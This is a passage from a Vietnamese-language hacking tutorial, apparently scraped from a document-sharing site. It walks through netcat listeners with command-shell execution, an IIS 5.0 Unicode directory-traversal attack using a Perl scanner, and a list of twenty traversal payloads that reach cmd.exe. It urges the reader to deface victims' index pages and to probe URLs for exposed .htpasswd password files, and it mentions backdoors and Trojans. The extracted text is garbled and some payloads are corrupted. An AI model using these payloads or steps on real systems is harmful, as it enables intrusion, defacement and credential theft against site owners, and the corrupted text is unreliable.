-p 53 - > lắng nghe cổng 53 listening on [172.16.84.1] 53 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ? Trên Windows NT, để đặt Netcat chế độ lắng nghe, khơng cần phải có quyền Administrator, cần login vào với username bình thường khởi động Netcat xong Chú ý: bạn chạy netcat với -u -e cmd.exe -u -e /bin/sh netcat khơng làm việc Nếu bạn muốn có UDP shell Unix, dùng udpshell thay cho netcat 49 ) Kỹ thuật hack IIS server 5.0 : _ IIS server với phiên từ trước đến phiên 5.0 có lỗi để ta khai thác , hầu hết người dùng IIS server 5.0 nên lỗi phiên trước không đề cập đến Bây bày bạn cách hack thông qua công cụ activeperl IE , bạn vận dụng cho trang Web VN chúng bị lỗi nhiều Ta bắt đầu _ Trước hết bạn download activeperl Unicode.pl _ Sử dụng telnet để xác định trang Web ta cơng có sử dụng IIS server 5.0 hay không : CODE telnet < tên trang Web > 80 GET HEAD / HTTP/1.0 Nếu khơng báo cho ta biết mục tiêu sử dụng chương trình bạn thay đổi cổng 80 cổng khác 8080, 81, 8000, 8001 v.v… _ Sau xác định mục tiêu bạn vào DOS gõ : CODE perl unicode.pl Host: ( gõ địa server mà bạn muốn hack ) Port: 80 ( 8080, 81, 8000, 8001 tuỳ theo cổng mà ta telnet trước ) _ Các bạn thấy bảng liệt kê lỗi ( lập trình Unicode.pl ) sau : CODE [1] /scripts/ %c0%af /winnt/system32/cmd.exe?/c+ [2]/scripts %c1%9c /winnt/system32/cmd.exe?/c+ [3] /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+ [4]/scripts/ %c0%9v /winnt/system32/cmd.exe?/c+ [5] /scripts/ %c0%qf /winnt/system32/cmd.exe?/c+ [6] /scripts/ %c1%8s /winnt/system32/cmd.exe?/c+ [7] /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+ [8] /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+ [9] /scripts/ %c1%af /winnt/system32/cmd.exe?/c+ [10] /scripts/ %e0%80%af /winnt/system32/cmd.exe?/c+ [11]/scripts/ %f0%80%80%af /winnt/system32/cmd.ex e?/c+ [12] /scripts/ %f8%80%80%80%af /winnt/system32/cmd.exe ?/c+ [13]/scripts/ %fc%80%80%80%80%af /winnt/system32/ cmd.exe?/c+ [14]/msadc/ \%e0\%80\%af / \%e0\%80\%af / \%e0 \ %80\%af /winnt/system32/cmd.exe?/c+ [15]/cgi-bin/ %c0%af %c0%af %c0%af %c0%af %c0% af /winnt/system32/cmd.exe?/c+ [16]/samples/ %c0%af %c0%af %c0%af %c0%af %c0% af /winnt/system32/cmd.exe?/c+ [17]/iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c 0%af /winnt/system32/cmd.exe?/c+ [18]/_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0 %af /winnt/system32/cmd.exe?/c+ [19]/_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0 %af /winnt/system32/cmd.exe?/c+ [20]/adsamples/ %c0%af %c0%af %c0%af %c0%af %c 0%af /winnt/system32/cmd.exe?/c+ Các bạn thấy tất lỗi trang Web nạn nhân bị tất lỗi , server nạn nhân bị lỗi thứ 13 17 bảng kết xuất dòng thứ 13 17 mà thơi Tôi lấy VD bảng kết cho biết trang Web nạn nhân bị lỗi thứ , IE nhập đoạn mã tương ứng Address : http://www.xxx.com/scripts/ Á%pc /winnt/s%20ystem32/cmd.exe?/c+ < == lỗi dòng thứ http://www.xxx.com/scripts/ Á /winnt/s%20ystem32/cmd.exe?/c+ < == lỗi dòng thứ Đến bạn xâm nhập vào server nạn nhân , bạn sử dụng lệnh DOS mà khai thác thông tin Thông thường trang Web nằm thư mục vinetpub\wwwroot , bạn vào rồI cần thay index.html vớI tên hack by … Là , đừng quậy họ GOOKLUCK!!!!!!!!!!!!!!! ... http://www.company .com/ cgi-bin/protected/.htp%20asswd Nếu bạn thấy có câu trả lờI `File not found` tương tự chắn file khơng bảo vệ , bạn tìm URL sau : http://www.company .com/ .htpasswd http://www.company .com/ cgi-bin/.htpasswd... http://www.company .com/ .htpasswd http://www.company .com/ cgi-bin/.htpasswd http://www.company .com/ cgi-bin/passwords/.htp%20asswd http://www.company .com/ cgi-bin/passwd/.htpass%20wd khơng thấy bạn cố... dễ dàng ) Hacker để lại ``Back Doors``, tức chế cho phép hacker truy nhập trở lại đường bí mật tốn nhiều công sức, việc cài đặt Trojan hay tạo user (đối với tổ chức có nhiều user) Cơng cụ loại
- Xem thêm -

Xem thêm: Com hacker 641 Những hiểu biết cơ bản nhất để trở thành Hacker, Com hacker 641 Những hiểu biết cơ bản nhất để trở thành Hacker

Từ khóa liên quan

Gợi ý tài liệu liên quan cho bạn

Nhận lời giải ngay chưa đến 10 phút Đăng bài tập ngay